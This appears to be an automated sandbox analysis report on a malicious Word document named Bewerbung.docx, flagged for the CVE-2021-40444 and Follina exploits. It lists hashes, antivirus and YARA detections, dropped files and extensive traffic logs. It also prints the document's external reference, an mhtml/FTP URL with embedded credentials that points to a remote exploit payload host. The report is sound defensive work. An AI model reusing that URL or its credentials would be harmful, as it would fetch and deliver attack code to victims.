Windows Analysis Report
Bewerbung.docx

Overview

General Information

Sample Name:	Bewerbung.docx
Analysis ID:	705530
MD5:	e7521cc41970a93d81eb7db063563474
SHA1:	668afe1cf1ff3a6b8b9f9b0ceaa81549944bffc2
SHA256:	d28398402e0b64cfb6e1f8e28cc21584eddd159690c2dab80aafae9c79201ae0
Infos:

Detection

CVE-2021-40444, Follina CVE-2022-30190

Score:	88
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Yara detected Microsoft Office Exploit Follina CVE-2022-30190

Detected CVE-2021-40444 exploit

Antivirus detection for dropped file

Contains an external reference to another file

Connects to many ports of the same IP (likely port scanning)

Yara signature match

Potential document exploit detected (unknown TCP traffic)

Detected TCP or UDP traffic on non-standard ports

Internet Provider seen in connection with other malware

Uses FTP

Classification

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Bewerbung.docx

Avira: detected

Multi AV Scanner detection for submitted file

Source: Bewerbung.docx	ReversingLabs: Detection: 20%
Source: Bewerbung.docx	Virustotal: Detection: 9%			Perma Link

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\smartscreen[1].html	Avira: detection malicious, Label: JS/CVE-2022-30190.G
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3FD475AA.html	Avira: detection malicious, Label: JS/CVE-2022-30190.G
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\smartscreen[1].html	Avira: detection malicious, Label: JS/CVE-2022-30190.G
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6245B5A3.html	Avira: detection malicious, Label: JS/CVE-2022-30190.G

Exploits

Yara detected Microsoft Office Exploit Follina CVE-2022-30190

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6245B5A3.html, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\smartscreen[1].html, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\smartscreen[1].html, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3FD475AA.html, type: DROPPED

Detected CVE-2021-40444 exploit

Source: document.xml.rels

Extracted files from sample: mhtml:ftp://epiz_32622638:9ptise0wwbczj@185.27.134.11/wwwwwwwwwwwwwwwwwwww/smartscreen.html!x-usc:ftp://epiz_32622638:9ptise0wwbczj@185.27.134.11/wwwwwwwwwwwwwwwwwwww/smartscreen.html

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Potential document exploit detected (unknown TCP traffic)

Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 185.27.134.11:39352
Source: global traffic	TCP traffic: 185.27.134.11:39352 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 185.27.134.11:39352
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 185.27.134.11:39352 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 185.27.134.11:39352
Source: global traffic	TCP traffic: 185.27.134.11:39352 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 185.27.134.11:39352 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 185.27.134.11:39352
Source: global traffic	TCP traffic: 185.27.134.11:39352 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 185.27.134.11:39352
Source: global traffic	TCP traffic: 185.27.134.11:39352 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 185.27.134.11:39352
Source: global traffic	TCP traffic: 185.27.134.11:39352 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 185.27.134.11:39352
Source: global traffic	TCP traffic: 185.27.134.11:39352 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 185.27.134.11:39352
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 185.27.134.11:39352
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 185.27.134.11:39352
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:39352 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49177
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49177
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49177
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49177
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49177
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49177
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49177
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49177
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 185.27.134.11:21699
Source: global traffic	TCP traffic: 185.27.134.11:21699 -> 192.168.2.22:49178
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 185.27.134.11:21699
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 185.27.134.11:21699 -> 192.168.2.22:49178
Source: global traffic	TCP traffic: 185.27.134.11:21699 -> 192.168.2.22:49178
Source: global traffic	TCP traffic: 185.27.134.11:21699 -> 192.168.2.22:49178
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 185.27.134.11:21699
Source: global traffic	TCP traffic: 185.27.134.11:21699 -> 192.168.2.22:49178
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 185.27.134.11:21699
Source: global traffic	TCP traffic: 185.27.134.11:21699 -> 192.168.2.22:49178
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 185.27.134.11:21699
Source: global traffic	TCP traffic: 185.27.134.11:21699 -> 192.168.2.22:49178
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 185.27.134.11:21699
Source: global traffic	TCP traffic: 185.27.134.11:21699 -> 192.168.2.22:49178
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 185.27.134.11:21699
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 185.27.134.11:21699
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 185.27.134.11:21699
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21699 -> 192.168.2.22:49178
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 185.27.134.11:47790
Source: global traffic	TCP traffic: 185.27.134.11:47790 -> 192.168.2.22:49181
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 185.27.134.11:47790
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 185.27.134.11:47790 -> 192.168.2.22:49181
Source: global traffic	TCP traffic: 185.27.134.11:47790 -> 192.168.2.22:49181
Source: global traffic	TCP traffic: 185.27.134.11:47790 -> 192.168.2.22:49181
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:47790 -> 192.168.2.22:49181
Source: global traffic	TCP traffic: 185.27.134.11:47790 -> 192.168.2.22:49181
Source: global traffic	TCP traffic: 185.27.134.11:47790 -> 192.168.2.22:49181
Source: global traffic	TCP traffic: 185.27.134.11:47790 -> 192.168.2.22:49181
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 185.27.134.11:47790
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 185.27.134.11:47790
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 185.27.134.11:47790
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 185.27.134.11:47790
Source: global traffic	TCP traffic: 185.27.134.11:47790 -> 192.168.2.22:49181
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 185.27.134.11:50652
Source: global traffic	TCP traffic: 185.27.134.11:50652 -> 192.168.2.22:49182
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 185.27.134.11:50652
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 185.27.134.11:50652 -> 192.168.2.22:49182
Source: global traffic	TCP traffic: 185.27.134.11:50652 -> 192.168.2.22:49182
Source: global traffic	TCP traffic: 185.27.134.11:50652 -> 192.168.2.22:49182
Source: global traffic	TCP traffic: 185.27.134.11:50652 -> 192.168.2.22:49182
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:50652 -> 192.168.2.22:49182
Source: global traffic	TCP traffic: 185.27.134.11:50652 -> 192.168.2.22:49182
Source: global traffic	TCP traffic: 185.27.134.11:50652 -> 192.168.2.22:49182
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 185.27.134.11:50652
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 185.27.134.11:50652
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 185.27.134.11:50652
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 185.27.134.11:50652
Source: global traffic	TCP traffic: 185.27.134.11:50652 -> 192.168.2.22:49182
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21

Networking

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 185.27.134.11 ports 21699,39352,1,2,50652,47790,21

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.22:49175 -> 185.27.134.11:39352

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: WILDCARD-ASWildcardUKLimitedGB WILDCARD-ASWildcardUKLimitedGB

Uses FTP

Source: unknown

FTP traffic detected: 185.27.134.11:21 -> 192.168.2.22:49173 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 434 of 6900 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 434 of 6900 allowed.220-Local time is now 09:04. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 434 of 6900 allowed.220-Local time is now 09:04. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 434 of 6900 allowed.220-Local time is now 09:04. Server port: 21.220-This is a private system - No anonymous login220 You will be disconnected after 60 seconds of inactivity.

Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{22F15F1C-2D40-4586-81FC-738423AAB483}.tmp

Jump to behavior

Yara signature match

Source: dump.pcap, type: PCAP	Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
Source: dump.pcap, type: PCAP	Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
Source: document.xml.rels, type: SAMPLE	Matched rule: SUSP_Doc_WordXMLRels_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, Wojciech Cieslak, description = Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-06-20, hash = 62f262d180a5a48f89be19369a8425bec596bc6a02ed23100424930791ae3df0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6245B5A3.html, type: DROPPED	Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6245B5A3.html, type: DROPPED	Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\smartscreen[1].html, type: DROPPED	Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\smartscreen[1].html, type: DROPPED	Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
